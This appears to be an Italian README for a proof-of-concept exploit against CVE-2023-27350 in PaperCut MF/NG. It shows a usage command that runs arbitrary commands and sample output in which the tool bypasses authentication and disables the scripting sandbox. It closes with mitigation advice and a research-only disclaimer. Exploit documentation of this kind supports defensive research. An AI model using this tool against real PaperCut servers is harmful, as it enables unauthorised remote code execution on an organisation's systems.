
Vulnerabilità PaperCut, le versioni interessate sono PaperCut MF o NG versione 8.0 o successive (escluse le versioni con patch) su tutte le piattaforme OS.
POC per CVE-2023-27350 che colpisce PaperCut MF/NG
##Versioni Affette 'PaperCut MF o NG versione 8.0 o successive (escluse le versioni corrette) su tutte le piattaforme OS.'
Questo POC utilizza una vulnerabilità di bypass dell'autenticazione concatenata con l'abuso della funzionalità di scripting integrata per eseguire codice.
python3 CVE-2023-27350.py --url 'http://10.0.40.56:9191' --command calc.exe
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y
Aggiorna all'ultima versione o mitiga seguendo le istruzioni nel PaperCut Security Advisory
Questo software è stato creato esclusivamente per scopi di ricerca accademica e per lo sviluppo di tecniche difensive efficaci, e non è destinato a essere utilizzato per attaccare sistemi se non esplicitamente autorizzato. I manutentori del progetto non sono responsabili per un uso improprio del software. Usare con responsabilità.